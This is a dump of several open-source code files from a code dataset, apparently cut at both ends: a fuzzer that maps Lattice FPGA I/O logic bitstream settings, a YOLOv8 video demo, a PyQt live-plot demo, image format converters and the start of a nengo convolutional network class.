FuzzConfig(job=\"IOL7AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R8C0:SYSIO_B7_0_ODD\"])),\n (\"IOL_L8B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R8C0:SYSIO_B7_0_ODD\"])),\n\n (\"IOL_T76A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL0AOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C76:SYSIO_B0_0_ODD\"])),\n (\"IOL_T76B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL0BOMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C76:SYSIO_B0_0_ODD\"])),\n\n (\"IOL_T78A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL0AEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C78:SYSIO_B0_0_EVEN\"])),\n (\"IOL_T78B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL0BEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R0C78:SYSIO_B0_0_EVEN\"])),\n\n (\"IOL_R46A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL2CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C87:SYSIO_B2_0_C\", \"CIB_R47C87:SYSIO_B2_0_REM\"])),\n (\"IOL_R46B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL2DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C87:SYSIO_B2_0_C\", \"CIB_R47C87:SYSIO_B2_0_REM\"])),\n (\"IOL_L46A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL6CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C0:SYSIO_B6_0_C\", \"CIB_R47C0:SYSIO_B6_0_REM\"])),\n (\"IOL_L46B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL6DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R46C0:SYSIO_B6_0_C\", \"CIB_R47C0:SYSIO_B6_0_REM\"])),\n (\"IOL_R10A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL1CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C87:SYSIO_B1_0_C\", \"CIB_R11C87:SYSIO_B1_0_REM\"])),\n (\"IOL_R10B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL1DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C87:SYSIO_B1_0_C\", \"CIB_R11C87:SYSIO_B1_0_REM\"])),\n (\"IOL_L10A\", \"SIOLOGICA\", FuzzConfig(job=\"IOL7CMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C0:SYSIO_B7_0_C\", \"CIB_R11C0:SYSIO_B7_0_REM\"])),\n (\"IOL_L10B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL7DMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R10C0:SYSIO_B7_0_C\", \"CIB_R11C0:SYSIO_B7_0_REM\"])),\n\n (\"IOL_R3B\", \"SIOLOGICB\", FuzzConfig(job=\"IOL3DEMODE\", device=\"LIFCL-40\", sv=\"../shared/empty_40.v\", tiles=[\"CIB_R3C87:SYSIO_B1_DED\"])),\n\n # LIFCL-17 tiles\n (\"IOL_T57A\", \"SIOLOGICA\", FuzzConfig(job=\"IOLT57AMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R0C57:SYSIO_B0_0_15K\"])),\n (\"IOL_T57B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLT57BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R0C57:SYSIO_B0_0_15K\"])),\n\n (\"IOL_R3B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLR3BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R3C75:SYSIO_B1_DED_15K\", \"CIB_R4C75:PIC_B1_DED_15K\"])),\n\n (\"IOL_R5A\", \"SIOLOGICA\", FuzzConfig(job=\"IOLR5AMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R5C75:SYSIO_B1_0_15K\"])),\n (\"IOL_R5B\", \"SIOLOGICB\", FuzzConfig(job=\"IOLR5BMODE\", device=\"LIFCL-17\", sv=\"../shared/empty_17.v\", tiles=[\"CIB_R5C75:SYSIO_B1_0_15K\"])),\n\n # It appears that LIFCL-17 does not expose any pins from\n # - SYSIO_B1_1_15K\n]\n\ndef main():\n def per_config(x):\n site, prim, cfg = x\n cfg.setup()\n empty = cfg.build_design(cfg.sv, {})\n\n if cfg.device == \"LIFCL-40\":\n cfg.sv = \"iologic_40.v\"\n elif cfg.device == \"LIFCL-17\":\n cfg.sv = \"iologic_17.v\"\n else:\n assert False, cfg.device\n\n s = (prim[0] == \"S\")\n\n side = site[4]\n pos = int(site[5:-1])\n ab = site[-1]\n\n if cfg.device == \"LIFCL-40\":\n if side == \"L\":\n rc = \"R{}C{}\".format(pos, 0)\n elif side == \"R\":\n rc = \"R{}C{}\".format(pos, 87)\n elif side == \"B\":\n rc = \"R{}C{}\".format(56, pos)\n elif side == \"T\":\n rc = \"R{}C{}\".format(0, pos)\n elif cfg.device == \"LIFCL-17\":\n if side == \"L\":\n rc = \"R{}C{}\".format(pos, 0)\n elif side == \"R\":\n rc = \"R{}C{}\".format(pos, 75)\n elif side == \"B\":\n rc = \"R{}C{}\".format(29, pos)\n elif side == \"T\":\n rc = \"R{}C{}\".format(0, pos)\n else:\n assert False, cfg.device\n\n def get_substs(mode=\"NONE\", default_cfg=False, scope=None, kv=None, mux=False, glb=False, dqs=False, pinconn=\"\"):\n if default_cfg:\n config = \"SCLKINMUX:#OFF GSR:ENABLED INMUX:#OFF OUTMUX:#OFF DELAYMUX:#OFF SRMODE:#ASYNC LOAD_NMUX:#OFF DIRMUX:#OFF MOVEMUX:#OFF CEOUTMUX:#OFF CEINMUX:#OFF LSRINMUX:#OFF LSROUTMUX:#OFF STOP_EN:DISABLED\"\n elif kv is None:\n config = \"\"\n elif glb:\n config=\"{}:{}\".format(kv[0], kv[1])\n elif dqs and \"_\" in kv[1]:\n val, dqsmode = kv[1].split(\"_\")\n config = \"{}:::{}={} WRCLKMUX:{}\".format(mode if scope is None else scope, kv[0], val, dqsmode)\n elif mux:\n signame = kv[0].replace(\"MUX\", \"\")\n val = \"{}:::{}=#SIG\".format(signame, signame)\n if kv[1] in (\"0\", \"1\"):\n val = \"CONST:::CONST={}\".format(kv[1])\n if kv[1] == \"INV\":\n val = \"{}:::{}=#INV\".format(signame, signame)\n config = \"{}:{}\".format(kv[0], val)\n else:\n config = \"{}:::{}={}\".format(mode if scope is None else scope, kv[0], kv[1])\n if pinconn != \"\":\n # Add routing so that pin is 'used'\n if \"TOUT\" in pinconn:\n if side in (\"L\", \"R\", \"T\"):\n first_wire = \"{}_JTOUT_SIOLOGIC_CORE_IBASE_PIC_{}\".format(rc, ab)\n second_wire = \"{}_JPADDT_SEIO33_CORE_IO{}\".format(rc, ab)\n else:\n first_wire = \"{}_JTOUT_IOLOGIC_CORE_I_GEARING_PIC_TOP_{}\".format(rc, ab)\n if ab == \"A\":\n second_wire = \"{}_JPADDT_DIFFIO18_CORE_IO{}\".format(rc, ab)\n else:\n second_wire = \"{}_JPADDT_SEIO18_CORE_IO{}\".format(rc, ab)\n else:\n if side in (\"L\", \"R\", \"T\"):\n first_wire = \"{}_JDOUT_SIOLOGIC_CORE_IBASE_PIC_{}\".format(rc, ab)\n second_wire = \"{}_JPADDO_SEIO33_CORE_IO{}\".format(rc, ab)\n else:\n first_wire = \"{}_JDOUT_IOLOGIC_CORE_I_GEARING_PIC_TOP_{}\".format(rc, ab)\n if ab == \"A\":\n second_wire = \"{}_JPADDO_DIFFIO18_CORE_IO{}\".format(rc, ab)\n else:\n second_wire = \"{}_JPADDO_SEIO18_CORE_IO{}\".format(rc, ab)\n route = '(* \\\\xref:LOG =\"q_c@0@9\", \\\\dm:arcs =\"{}.{}\" *) '.format(second_wire, first_wire)\n sig = route + \"wire sig;\"\n else:\n sig = \"\"\n return dict(mode=mode, cmt=\"//\" if mode == \"NONE\" else \"\", config=config, site=site, s=\"S\" if s else \"\", pinconn=pinconn, sig=sig)\n modes = [\"NONE\", \"IREG_OREG\", \"IDDRX1_ODDRX1\"]\n if not s:\n modes += [\"IDDRXN\", \"ODDRXN\", \"MIDDRXN_MODDRXN\"]\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MODE\".format(prim), modes,\n lambda x: get_substs(x, default_cfg=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.GSR\".format(prim), [\"ENABLED\", \"DISABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"GSR\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.SRMODE\".format(prim), [\"ASYNC\", \"LSR_OVER_CE\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"SRMODE\", x), glb=True), False)\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRXN.DDRMODE\".format(prim), [\"NONE\", \"IDDRX2\", \"IDDR71\", \"IDDRX4\", \"IDDRX5\"],\n lambda x: get_substs(mode=\"IDDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x)), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.ODDRXN.DDRMODE\".format(prim), [\"NONE\", \"ODDRX2\", \"ODDR71\", \"ODDRX4\", \"ODDRX5\"],\n lambda x: get_substs(mode=\"ODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x)), False)\n\n for sig in (\"SCLKIN\", \"SCLKOUT\", \"CEIN\", \"CEOUT\", \"LSRIN\", \"LSROUT\"):\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.{}MUX\".format(prim, sig), [\"1\" if sig[0:2] == \"CE\" else \"0\", sig, \"INV\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"{}MUX\".format(sig), x), mux=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.OUTPUT\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", default_cfg=True, pinconn=(\".DOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.OUTPUT\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", default_cfg=True, pinconn=(\".DOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", kv=(\"TOUTMUX\", \"TSREG\"), glb=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"TOUTMUX\", \"TSREG\"), glb=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n else:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", default_cfg=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", default_cfg=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.INMUX\".format(prim), [\"BYPASS\", \"DELAY\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"INMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.OUTMUX\".format(prim), [\"BYPASS\", \"DELAY\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"OUTMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.DELAYMUX\".format(prim), [\"OUT_REG\", \"IN\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"DELAYMUX\", x), glb=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MOVEMUX\".format(prim), [\"0\", \"MOVE\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"MOVEMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.DIRMUX\".format(prim), [\"0\", \"DIR\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"DIRMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.LOAD_NMUX\".format(prim), [\"1\", \"LOAD_N\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"LOAD_NMUX\", x), glb=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.INREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"INREG\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.OUTREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"OUTREG\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.TSREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"TSREG\"), False)\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MIDDRXN.DDRMODE\".format(prim), [\"NONE\", \"MIDDRX2\", \"MIDDRX4\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x), scope=\"MIDDRXN\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MODDRXN.DDRMODE\".format(prim), [\"NONE\", \"MOSHX2\", \"MOSHX4\", \"MODDRX2_DQSW\", \"MODDRX4_DQSW\", \"MODDRX2_DQSW270\", \"MODDRX4_DQSW270\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x), scope=\"MODDRXN\", dqs=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MTDDRXN.DDRMODE\".format(prim), [\"NONE\", \"MTSHX2\", \"MTSHX4\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x + \" TOUTMUX:MTDDR\"), scope=\"MTDDRXN\"), False)\n fuzzloops.parallel_foreach(configs, per_config)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gatecat/prjoxide","sub_path":"fuzzers/LIFCL/070-iologic_mode/fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":16036,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"18"} +{"seq_id":"72326089639","text":"# 引入cv2用于视频处理\nimport cv2\n# 引入YOLO模型用于目标检测\nfrom ultralytics import YOLO\n\n# 加载YOLO模型,进行目标检测\nmodel = YOLO('../weights/yolov8n-seg.pt')\n\n# 打开视频文件,这里的路径需要自行替换\nvideo_path = \"../assets/people_walking_1.mp4\"\ncap = cv2.VideoCapture(video_path)\n\n# 循环读取视频帧\nwhile cap.isOpened():\n # 读取一帧图像\n success, frame = cap.read()\n\n if not success:\n print(\"没有内容,退出啦 :) \")\n break\n\n if success:\n # 对读取的帧进行目标检测\n results = model(frame)\n\n # 可视化检测结果,这里设置置信度阈值为0.5,不显示框,显示掩码和概率\n annotated_frame = results[0].plot(conf=0.5, boxes=False, masks=True, probs=True)\n\n # 显示标注后的帧\n cv2.imshow(\"YOLOv8 Inference\", annotated_frame)\n\n # 如果按下“q”键,跳出循环\n # if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n # break\n if cv2.waitKey(24) == ord('q'): # 改为24ms,如果是1ms,则播放速度过快。\n break\n\n else:\n # 如果视频结束,跳出循环\n break\n\n# 释放视频捕捉对象,并关闭所有窗口\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"LiuEhe/YOLO_detect","sub_path":"demo/yolov8_smaple.py","file_name":"yolov8_smaple.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14073227617","text":"from PyQt5 import QtWidgets, QtCore\nfrom pyqtgraph import PlotWidget, plot\nimport pyqtgraph as pg\nimport sys # We need sys so that we can pass argv to QApplication\nimport os\nfrom random import randint\n\nclass MainWindow(QtWidgets.QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.init_status_figure()\n self.update_status_figure()\n \n def init_status_figure(self):\n\n \n self.graphWidget = pg.PlotWidget()\n self.setCentralWidget(self.graphWidget)\n\n self.status_x = list(range(100)) # 100 time points\n self.status_y = [randint(0,100) for _ in range(100)] # 100 data points\n\n self.graphWidget.setBackground('w')\n\n pen = pg.mkPen(color=(255, 0, 0))\n self.data_line = self.graphWidget.plot(self.status_x, self.status_y, pen=pen)\n #\n # def status_fig_window(self):\n # trendGroupBox = QGroupBox(\"\") \n # childWindow.setObjectName(\"\")\n # childWindow.setWindowTitle(\"Online data monitoring for ADC channel %s\" % str(subindex))\n # childWindow.resize(600, 300) # w*h\n # logframe = QFrame()\n # logframe.setLineWidth(0.6)\n # childWindow.setCentralWidget(logframe)\n # self.trendLayout = QGridLayout()\n # Fig = self.graphWidget\n # self.trendLayout.addWidget(Fig, 0, 0)\n # trendGroupBox.setLayout(self.trendLayout)\n # logframe.setLayout(self.trendLayout) \n \n def update_status_figure(self): \n self.timer = QtCore.QTimer()\n self.timer.setInterval(50)\n self.timer.timeout.connect(self.update_communication_status)\n self.timer.start()\n \n def update_communication_status(self):\n\n self.status_x = self.status_x[1:] # Remove the first y element.\n self.status_x.append(self.status_x[-1] + 1) # Add a new value 1 higher than the last.\n\n self.status_y = self.status_y[1:] # Remove the first\n self.status_y.append( randint(0,100)) # Add a new random value.\n\n self.data_line.setData(self.status_x, self.status_y) # Update the data.\n \napp = QtWidgets.QApplication(sys.argv)\nw = MainWindow()\nw.show()\nsys.exit(app.exec_())","repo_name":"ahmedqamesh/mopshub-sw-kcu102","sub_path":"test_files/pygraph.py","file_name":"pygraph.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22468099476","text":"import argparse\nfrom collections import defaultdict\nfrom enum import Enum\nimport os\nfrom typing import cast, Dict, Optional, Sequence, Tuple\nfrom typing_extensions import Buffer\n\nimport numpy as np\nimport PIL\n\nfrom calliope.models import ImageFormat\nfrom calliope.tables import Image\nfrom calliope.utils.file import get_file_extension\n\n\ndef guess_image_format_from_filename(filename: str) -> ImageFormat:\n extension = get_file_extension(filename)\n if extension in (\"raw\", \"rgb565\"):\n return ImageFormat.RGB565\n if extension in (\"grayscale16\"):\n return ImageFormat.GRAYSCALE16\n elif extension in (\"jpg\", \"jpeg\"):\n return ImageFormat.JPEG\n elif extension == \"png\":\n return ImageFormat.PNG\n else:\n raise ValueError(f\"Unrecognized image format for {filename}\")\n\n\ndef image_format_to_media_type(image_format: ImageFormat) -> str:\n return image_format.value\n\n\n# For a good discussion of the RGB565 format,\n# see: http://www.barth-dev.de/online/rgb565-color-picker/#\n\n# The below conversion code was inspired by https://github.com/CommanderRedYT\n\n\ndef convert_png_to_rgb565(input_filename: str, output_filename: str) -> Image:\n \"\"\"\n Converts the given PNG file to RGB565/raw format.\n \"\"\"\n png = PIL.Image.open(input_filename)\n\n input_image_content = png.getdata()\n output_image_content = np.empty(len(input_image_content), np.uint16)\n for i, pixel in enumerate(input_image_content):\n r = (pixel[0] >> 3) & 0x1F\n g = (pixel[1] >> 2) & 0x3F\n b = (pixel[2] >> 3) & 0x1F\n rgb = r << 11 | g << 5 | b\n output_image_content[i] = rgb\n\n with open(output_filename, \"wb\") as output_file:\n output_file.write(cast(Buffer, output_image_content))\n\n return Image(\n width=png.width,\n height=png.height,\n format=ImageFormat.RGB565.value,\n url=output_filename,\n )\n\n\ndef convert_rgb565_to_png(\n input_filename: str, output_filename: str, width: int, height: int\n) -> Image:\n \"\"\"\n Converts the given RGB565/raw file to PNG format.\n \"\"\"\n with open(input_filename, \"r\") as input_file:\n dataArray = np.fromfile(input_file, np.uint16)\n\n png = PIL.Image.new(\"RGB\", (width, height))\n\n for i, word in enumerate(np.nditer(dataArray)):\n r = (word >> 11) & 0x1F # type: ignore[operator]\n g = (word >> 5) & 0x3F # type: ignore[operator]\n b = word & 0x1F # type: ignore[operator]\n png.putpixel((i % width, i // width), (r << 3, g << 2, b << 3))\n\n png.save(output_filename)\n\n return Image(\n width=width,\n height=height,\n format=ImageFormat.PNG.value,\n url=output_filename,\n )\n\n\ndef convert_png_to_grayscale16(input_filename: str, output_filename: str) -> Image:\n \"\"\"\n Converts the given PNG file to 'grayscale-16' format.\n There are 2 pixels per byte, 4 bits (black, white, 14 shades of gray) each.\n \"\"\"\n\n png = PIL.Image.open(input_filename)\n # Convert to grayscale.\n png = png.convert(mode=\"L\")\n\n input_image_content = png.getdata()\n output_image_content = np.empty(int(len(input_image_content) / 2), np.uint8)\n i = 0\n for y in range(0, png.size[1]):\n byte = 0\n done = True\n for x in range(0, png.size[0]):\n l = png.getpixel((x, y))\n if x % 2 == 0:\n byte = l >> 4\n done = False\n else:\n byte |= l & 0xF0\n output_image_content[i] = byte\n done = True\n i += 1\n if not done:\n output_image_content[i] = byte\n\n with open(output_filename, \"wb\") as output_file:\n output_file.write(cast(Buffer, output_image_content))\n\n return Image(\n width=png.width,\n height=png.height,\n format=ImageFormat.GRAYSCALE16.value,\n url=output_filename,\n )\n\n\ndef convert_grayscale16_to_png(\n input_filename: str, output_filename: str, width: int, height: int\n) -> Image:\n \"\"\"\n Converts 'grayscale-16' file to PNG.\n There are 2 pixels per byte, 4 bits (black, white, 14 shades of gray) each.\n \"\"\"\n\n with open(input_filename, \"r\") as input_file:\n dataArray = np.fromfile(input_file, np.uint8)\n\n png = PIL.Image.new(\"L\", (width, height))\n\n for i, pixel_pair in enumerate(np.nditer(dataArray)):\n p0 = int(pixel_pair & 0xF) << 4 # type: ignore[operator]\n i *= 2\n x = i % width\n y = i // width\n if y >= height:\n # Due to an earlier bug, some stored images have too much data.\n break\n png.putpixel((x, y), p0)\n\n p1 = int(pixel_pair) # type: ignore[call-overload]\n i += 1\n x = i % width\n y = i // width\n if y >= height:\n # Due to an earlier bug, some stored images have too much data.\n break\n png.putpixel((x, y), p1)\n\n png.save(output_filename)\n\n return Image(\n width=width,\n height=height,\n format=ImageFormat.PNG.value,\n url=output_filename,\n )\n\n\ndef convert_pil_image_to_png(image_filename: str) -> str:\n \"\"\"\n Converts a standard image file (one understood by\n the PIL library) to PNG format, if it isn't already, in\n a new file with the .png extension.\n\n Note that this won't work with the specialized grayscale\n and RGB565 formats that Calliope provides for Sparrow hardware,\n as PIL doesn't support these.\n\n Args:\n image_filename: the filename of an image.\n\n Returns:\n the filename of the new or existing PNG file.\n \"\"\"\n extension = get_file_extension(image_filename)\n if extension != \"png\":\n image_filename_png = image_filename + \".png\"\n img = PIL.Image.open(image_filename)\n img.save(image_filename_png)\n image_filename = image_filename_png\n\n return image_filename\n\n\ndef resize_image_if_needed(\n input_image: Image,\n output_image_width: Optional[int],\n output_image_height: Optional[int],\n output_filename: str,\n) -> Optional[Image]:\n \"\"\"\n Resizes a given image iff necessary given output_image_width and\n output_image_height.\n \"\"\"\n resized_image = None\n\n if output_image_width and output_image_height:\n img = PIL.Image.open(input_image.url)\n if img.width != output_image_width or img.height != output_image_height:\n # Fit the image into the bounding box given by (output_image_width,\n # output_image_height)...\n scaling_factor = min(\n output_image_width / img.width, output_image_height / img.height\n )\n resized_width = int(scaling_factor * img.width)\n resized_height = int(scaling_factor * img.height)\n scaled_image_size = (resized_width, resized_height)\n img = img.resize(scaled_image_size)\n\n output_image_size = (output_image_width, output_image_height)\n if output_image_size != scaled_image_size:\n # If the scaled image doesn't match the requested image size,\n # add black bars to either side of it...\n new_image = PIL.Image.new(\n \"RGB\", output_image_size\n ) # A blank image, all black.\n box = (\n (output_image_width - resized_width) // 2,\n (output_image_height - resized_height) // 2,\n )\n\n # Paste the scaled image into the middle of the black image.\n new_image.paste(img, box)\n new_image.save(output_filename)\n resized_width = output_image_width\n resized_height = output_image_height\n else:\n # Otherwise, just save the resized image.\n img.save(output_filename)\n\n resized_image = Image(\n width=resized_width,\n height=resized_height,\n format=input_image.format,\n url=output_filename,\n )\n\n return resized_image\n\n\ndef get_image_attributes(image_filename: str) -> Image:\n \"\"\"\n Gets an Image from an image filename.\n \"\"\"\n image = PIL.Image.open(image_filename)\n format = guess_image_format_from_filename(image_filename)\n\n return Image(\n width=image.width,\n height=image.height,\n format=format.value,\n url=image_filename,\n )\n\n\ndef get_image_colors(image_filename: str) -> Sequence[Tuple[int, int]]:\n \"\"\"\n Returns a sequence of (count, color) tuples with colors given in the mode of the image (e.g. RGB).\n \"\"\"\n image = PIL.Image.open(image_filename)\n by_color: Dict[int, int] = defaultdict(int)\n for pixel in image.getdata():\n by_color[pixel] += 1\n return cast(Sequence[Tuple[int, int]], list(by_color.items()))\n\n\ndef image_is_monochrome(image_filename: str) -> bool:\n \"\"\"\n Returns True iff the given image is of a single solid d\n \"\"\"\n colors = get_image_colors(image_filename)\n return colors is not None and len(colors) == 0\n\n\nclass Mode(Enum):\n RAW = \".raw\"\n PNG = \".png\"\n\n\ndef main() -> None:\n \"\"\"\n A little utility test harness for conversion to/from the rgb565 format.\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Convert a file from one format to another.\"\n )\n parser.add_argument(\n \"-i\",\n \"--input\",\n required=True,\n dest=\"input_file\",\n help=\"Input file to be converted.\",\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n nargs=\"?\",\n dest=\"output_file\",\n help=\"Output file to be converted.\",\n )\n parser.add_argument(\n \"--width\",\n dest=\"width\",\n help=\"The image width in pixels.\",\n )\n parser.add_argument(\n \"--height\",\n dest=\"height\",\n help=\"The image height in pixels.\",\n )\n args = parser.parse_args()\n input_filename = args.input_file\n output_filename = args.output_file\n width = int(args.width) if args.width else 0\n height = int(args.height) if args.height else 0\n\n input_basename = os.path.basename(input_filename).rsplit(\".\", 1)\n\n mode = Mode.RAW if (input_basename[1] == \"png\") else Mode.PNG\n\n if output_filename is None:\n output_filename = input_basename[0] + mode.value\n\n output_basename = os.path.basename(output_filename).rsplit(\".\", 1)\n\n if len(output_basename) != 2:\n print(\"Error: Invalid arguments.\")\n exit(1)\n\n if input_basename[1] not in [\"png\", \"raw\"]:\n print(\"Error: Input file must be a .png or .raw file.\")\n exit(1)\n\n if output_basename[1] not in [\"png\", \"raw\"]:\n print(\"Error: Output file must be a .png or .raw file.\")\n print(f\"Output file: {output_basename}\")\n exit(1)\n\n if input_basename[1] == output_basename[1]:\n print(\"Error: Input and output file must be different.\")\n exit(1)\n\n if mode == Mode.PNG:\n convert_rgb565_to_png(input_filename, output_filename, width, height)\n else:\n convert_png_to_rgb565(input_filename, output_filename)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chrisimmel/calliope","sub_path":"calliope/utils/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":11270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"26585854633","text":"import nengo\nimport nengo_dl\nimport numpy as np\n\n\nclass ConvNet(object):\n def __init__(self, net, max_rate=100):\n amp = 1 / max_rate\n net.config[nengo.Ensemble].neuron_type = nengo.RectifiedLinear(amplitude=amp)\n net.config[nengo.Ensemble].max_rates = nengo.dists.Choice([max_rate])\n net.config[nengo.Ensemble].intercepts = nengo.dists.Choice([0])\n net.config[nengo.Connection].synapse = None \n self.net = net\n self.layers = []\n self.output_shapes = []\n self.input = None\n \n def make_input_layer(self, source_shape,\n spatial_stride=(1, 1),\n spatial_size=None,\n use_separate_nodes=False,\n index_map=None): \n if spatial_size is None:\n spatial_size = (source_shape[2], source_shape[1])\n\n with self.net:\n if self.input is None:\n self.input = nengo.Node(\n None,\n size_in=source_shape[0]*source_shape[1]*source_shape[2],\n label='input')\n\n j = 0\n w = spatial_size[0]\n h = spatial_size[1]\n if index_map is not None:\n items = index_map\n else:\n items = 